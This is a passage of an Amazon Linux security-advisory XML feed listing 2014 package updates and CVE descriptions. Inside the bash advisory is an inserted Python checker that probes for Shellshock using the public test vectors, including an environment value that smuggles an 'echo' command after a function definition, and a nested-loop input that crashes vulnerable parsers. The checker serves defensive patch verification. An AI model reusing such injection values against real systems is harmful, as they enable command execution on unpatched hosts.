name="php55-opcache" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.17" release="1.90.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-opcache-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.17" release="1.90.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-pspell-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.17" release="1.90.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-mbstring-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.17-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-416</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-416: medium priority package update for json-c</title><issued date="2014-09-18 21:04:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6371:
The hash functionality in json-c before 0.12 allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted JSON data, involving collisions.
1032311:
CVE-2013-6371 json-c: hash collision DoS
CVE-2013-6370:
Buffer overflow in the printbuf APIs in json-c before 0.12 allows remote attackers to cause a denial of service via unspecified vectors.
1032322:
CVE-2013-6370 json-c: buffer overflow if size_t is larger than int
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6370" title="" id="CVE-2013-6370" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6371" title="" id="CVE-2013-6371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="json-c-debuginfo" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-debuginfo-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c-doc" version="0.11" release="6.8.amzn1" epoch="0" arch="noarch"><filename>Packages/json-c-doc-0.11-6.8.amzn1.noarch.rpm</filename></package><package name="json-c-devel" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-devel-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c-debuginfo" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-debuginfo-0.11-6.8.amzn1.i686.rpm</filename></package><package name="json-c" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-0.11-6.8.amzn1.i686.rpm</filename></package><package name="json-c-devel" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-devel-0.11-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-417</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-417: medium priority package update for kernel</title><issued date="2014-09-18 21:04:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5207:
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
1129662:
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
CVE-2014-5206:
The do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a "mount -o remount" command within a user namespace.
1129662:
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5206" title="" id="CVE-2014-5206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5207" title="" id="CVE-2014-5207" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package 
name="kernel-headers" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.19" 
release="17.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.19-17.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-418</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-418: critical priority package update for bash</title><issued date="2014-09-24 07:48:00" /><updated date="2014-09-25 22:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6271:
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.
1141597:
CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" title="" id="CVE-2014-6271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.1.2-15.19.amzn1.i686.rpm</filename></package><package name="bash" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.1.2-15.19.amzn1.i686.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.1.2-15.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-419</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-419: important priority package update for bash</title><issued date="2014-09-24 22:26:00" /><updated date="2014-09-27 18:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7187:
An off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.
1146804:
CVE-2014-7187 bash: off-by-one error in deeply nested flow control constructs
CVE-2014-7186:
It was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code.
1146791:
CVE-2014-7186 bash: parser can allow out-of-bounds memory access while handling redir_stack
CVE-2014-7169:
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
Details pending
1146319:
CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
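ALAS-2014-418 and ALAS-2014-419 above both fix the way bash imports function definitions from the environment. The Python below is an added example, not Amazon's or the bash project's code: it runs the publicly circulated test vectors for CVE-2014-6271, CVE-2014-7169 and CVE-2014-7187 against the local bash binary so an operator can confirm that the update took effect (CVE-2014-7186 is not probed). It assumes a bash on PATH; the variable names x and X and the SHELLSHOCK marker are arbitrary choices.

```python
import os
import shutil
import subprocess
import tempfile

# Added example, not part of the ALAS feed. Probes a local bash binary with
# the publicly known test vectors for CVE-2014-6271, CVE-2014-7169 and
# CVE-2014-7187. Each check returns "vulnerable", "patched" or "no-bash".

BASH = shutil.which("bash")
# Minimal environment so the probe variables are the only unusual input.
BASE_ENV = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}


def check_cve_2014_6271():
    """Function import: bash must not execute text after the function body."""
    if BASH is None:
        return "no-bash"
    env = dict(BASE_ENV, x="() { :;}; echo SHELLSHOCK")
    out = subprocess.run([BASH, "-c", "echo probe"], env=env,
                         capture_output=True, text=True).stdout
    return "vulnerable" if "SHELLSHOCK" in out else "patched"


def check_cve_2014_7169():
    """Incomplete fix: parser state leaks, so the redirection left in the
    variable is applied to the next command and a file named "echo"
    appears in the working directory."""
    if BASH is None:
        return "no-bash"
    env = dict(BASE_ENV, X="() { (a)=>\\")
    with tempfile.TemporaryDirectory() as tmp:
        subprocess.run([BASH, "-c", "echo date"], env=env, cwd=tmp,
                       capture_output=True)
        created = os.path.exists(os.path.join(tmp, "echo"))
    return "vulnerable" if created else "patched"


def check_cve_2014_7187():
    """Off-by-one in nested flow control: 200 nested "for" loops crash a
    vulnerable parser; a fixed bash parses them and exits 0."""
    if BASH is None:
        return "no-bash"
    script = "".join(f"for x{i} in ; do :\n" for i in range(200)) + "done\n" * 200
    rc = subprocess.run([BASH], input=script, env=BASE_ENV,
                        capture_output=True, text=True).returncode
    return "patched" if rc == 0 else "vulnerable"


def run_all():
    """Map each CVE from ALAS-2014-418/419 that has a local probe to its result."""
    return {
        "CVE-2014-6271": check_cve_2014_6271(),
        "CVE-2014-7169": check_cve_2014_7169(),
        "CVE-2014-7187": check_cve_2014_7187(),
    }


if __name__ == "__main__":
    for cve, status in run_all().items():
        print(f"{cve}: {status}")
```

Run it as the user that owns the exposed service (CGI handler, DHCP client hook, ForceCommand login) after installing bash-4.1.2-15.21.amzn1 or later; every probe should print "patched". The checks exercise only the parser, so they are safe to run on a production host.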
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169" title="" id="CVE-2014-7169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186" title="" id="CVE-2014-7186" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187" title="" id="CVE-2014-7187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash-doc" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.1.2-15.21.amzn1.i686.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.1.2-15.21.amzn1.i686.rpm</filename></package><package name="bash" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.1.2-15.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-420</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-420: medium priority package update for GraphicsMagick</title><issued date="2014-10-01 16:28:00" /><updated date="2014-10-01 18:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1947:
1064098:
CVE-2014-1947 ImageMagick: PSD writing layer name buffer overflow ("L%02ld")
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1947" title="" id="CVE-2014-1947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.20" release="3.5.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.20-3.5.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.20" release="3.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.20-3.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-421</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-421: medium priority package update for nginx</title><issued date="2014-10-01 16:28:00" /><updated date="2014-10-01 18:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3616:
1142573:
CVE-2014-3616 nginx: virtual host confusion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3616" title="" id="CVE-2014-3616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.6.2" release="1.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.6.2-1.22.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.6.2" release="1.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.6.2-1.22.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.6.2" release="1.22.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.6.2-1.22.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.6.2" release="1.22.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.6.2-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-422</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-422: important priority package update for nss-util</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util-debuginfo" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.16.2-2.4.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.16.2-2.4.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.16.2-2.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-423</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-423: important priority package update for nss-softokn</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-debuginfo" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2" release="2.2.amzn1" epoch="0" 